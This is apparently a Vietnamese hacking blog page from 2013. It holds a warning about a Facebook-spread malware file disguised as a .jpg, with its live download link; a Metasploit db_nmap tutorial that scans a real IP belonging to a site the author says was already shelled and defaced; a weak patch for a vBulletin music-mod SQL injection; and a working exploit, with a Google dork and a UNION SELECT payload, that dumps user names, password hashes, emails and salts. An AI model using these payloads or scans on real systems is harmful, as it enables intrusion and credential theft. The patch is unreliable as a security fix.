Thứ Ba, 18 tháng 6, 2013
Chủ Nhật, 28 tháng 4, 2013
Cảnh báo về virus facebook đang hoành hành
- Trong đợt này thường xuyên có vài người inbox gởi đến 1 cái link : http://www.mediafire.com/?7zz9bjgakf1okjv/image9922.jpg
- Ex :
- Nhìn có vẻ là .jpg nhưng người làm ra con này sử dụng kỹ thuật extension thay đổi đuôi của file .
- Sau khi tải về tôi thử chạy nó và kết quả thì thấy ở facebook tôi đã tự động gởi 1 nội dung : "http://www.mediafire.com/?7zz9bjgakf1okjv/image9922.jpg" đến những người đã từng inbox với tôi
- Một hồi phân tích thì thằng làm ra con này cũng không phải tay vừa :D . Chả ai nghĩ 16kb của nó lại tạo ra được 1 file 67kb đâu :))
################################################## ######
# hầu như chỉ có vài AV phát hiện được . Tôi thử avira nhưng kết quả là không tìm thấy !
* Kết quả : http://chk4me.com/check/public/NTXx1...6ZF_M398DSOC1l
################################################## ######
################################################## ######
# Folder infection : C:\Documents and Settings\[User]\Application Data\ , Auto Startup
# File name : svchosts.exe, nig78.tmp.bat
################################################## ######
Cái ruột :
Tut By Midz
- Ex :
- Nhìn có vẻ là .jpg nhưng người làm ra con này sử dụng kỹ thuật extension thay đổi đuôi của file .
- Sau khi tải về tôi thử chạy nó và kết quả thì thấy ở facebook tôi đã tự động gởi 1 nội dung : "http://www.mediafire.com/?7zz9bjgakf1okjv/image9922.jpg" đến những người đã từng inbox với tôi
- Một hồi phân tích thì thằng làm ra con này cũng không phải tay vừa :D . Chả ai nghĩ 16kb của nó lại tạo ra được 1 file 67kb đâu :))
################################################## ######
# hầu như chỉ có vài AV phát hiện được . Tôi thử avira nhưng kết quả là không tìm thấy !
* Kết quả : http://chk4me.com/check/public/NTXx1...6ZF_M398DSOC1l
################################################## ######
################################################## ######
# Folder infection : C:\Documents and Settings\[User]\Application Data\ , Auto Startup
# File name : svchosts.exe, nig78.tmp.bat
################################################## ######
Cái ruột :
Tut By Midz
Thứ Năm, 18 tháng 4, 2013
Scan Victim bằng Metasploit
Mình đã viết một bài về Metasploit framwork rồi.
Phần này mình viết tiếp về nó.Dù nó ko liên quan gì lắm với nhau
)
Phần này mình đề cập tiếp đến vấn đề scan mục tiêu cần attack đã nói trong phần trước.
Scan mục tiêu là vấn đề rất quan trọng.thu thập đc càng nhiều thông tin càng tốt.Chả thừa gì đối với chúng ta cả.
Trong metasploit framework có một module sử dụng bộ công cụ scan nmap .Trong quá trình họat động nó sử dụng giữ liệu thu đc bằng quá trình scan bởi nmap một cách tự động.
Như mình từng đề cập ở nhiều bài trước.Làm gì thì làm.Trước khi dùng mấy bộ công cụ này thì tốt nhất là nên update trước.Dữ liệu của nó cập nhật theo ngày.Nên update là ko thừa.
Step1: Vào msfconsole ,rồi type db_nmap
Phần này mình viết tiếp về nó.Dù nó ko liên quan gì lắm với nhau
)Phần này mình đề cập tiếp đến vấn đề scan mục tiêu cần attack đã nói trong phần trước.
Scan mục tiêu là vấn đề rất quan trọng.thu thập đc càng nhiều thông tin càng tốt.Chả thừa gì đối với chúng ta cả.
Trong metasploit framework có một module sử dụng bộ công cụ scan nmap .Trong quá trình họat động nó sử dụng giữ liệu thu đc bằng quá trình scan bởi nmap một cách tự động.
Như mình từng đề cập ở nhiều bài trước.Làm gì thì làm.Trước khi dùng mấy bộ công cụ này thì tốt nhất là nên update trước.Dữ liệu của nó cập nhật theo ngày.Nên update là ko thừa.
Step1: Vào msfconsole ,rồi type db_nmap
root@bt:~# msfconsole
msf > db_nmap
[*] Usage: db_nmap [nmap options]
Nhận đc thông báo nmap_option --> ta có thể sử dụng các option của nmap thông thường.
Thử scan victim nào đó nhé.Hộm nó mới có con shell trên honda67.com mấy mem up lên huynhdegroup.net.Hôm nay vào tên nào đã deface rồi.Nên lấy nó test luôn.
Ip của honda67.com là 112.78.2.15
msf > db_nmap 112.78.2.15
Fix bug SQLI Mod vB4 Gift Music
Bug này đã có exploit và bị khai thác triệt để nhưng vẫn chưa có ai đưa ra bản vá cho nó, hôm nay rảnh được chút thời gian nên mình làm cái tut cho oai chứ thật ra là đọc code và fix lỗi cho nó thôi kakaka.
cách fix bug này:
vào: Admincp -> Plugin & product option -> Plugin manage -> [HQTH]Music Gift -> [HQTH]Music Gift có hook misc_start -> edit (sửa) -> tìm dòng code dưới:
if($_GET[id]) $m = $vbulletin->db->query_first("SELECT * FROM ". TABLE_PREFIX
."hqth_music WHERE id = $_GET[id] AND pulish = 1");
if($_GET[id]) $m = $vbulletin->db->query_first("SELECT * FROM ". TABLE_PREFIX
."hqth_music WHERE id = '". stripslashes($_GET[id]) ."' AND pulish = 1"); /*fixed by ccb*/
vd:
("SELECT * FROM ". TABLE_PREFIX ."hqth_music WHERE id = $_GET[id] AND pulish = 1");
thì thay bằng:
("SELECT * FROM ". TABLE_PREFIX ."hqth_music WHERE id = '". stripslashes($_GET[id]) ."' AND pulish = 1");
nguồn: concobe - VHB - huynhdegroup.net
Tut by Concobe
SQLI Mod vB4 Gift Music
################################################## ####
# SQLI Mods vB4 Gift Music
# Google Dork: dork là misc.php?do=music_full&id=
# Exploit Author: GhostVN
################################################## ####
Exploitation:
http://domains.com/forum/misc.php?do=music_full&id=null
http://domains.com/forum/misc.php?do=music_full&id=20 UNION SELECT 1,group_concat(username,0x7c,password,0x7c,email,0 x7c,salt),3,4,5,6,7,8,9,10,11,12,13,14,15 from user where userid=1-- -
# SQLI Mods vB4 Gift Music
# Google Dork: dork là misc.php?do=music_full&id=
# Exploit Author: GhostVN
################################################## ####
Exploitation:
http://domains.com/forum/misc.php?do=music_full&id=null
http://domains.com/forum/misc.php?do=music_full&id=20 UNION SELECT 1,group_concat(username,0x7c,password,0x7c,email,0 x7c,salt),3,4,5,6,7,8,9,10,11,12,13,14,15 from user where userid=1-- -
Tut by GhostVN_VHB
Đăng ký:
Bài đăng (Atom)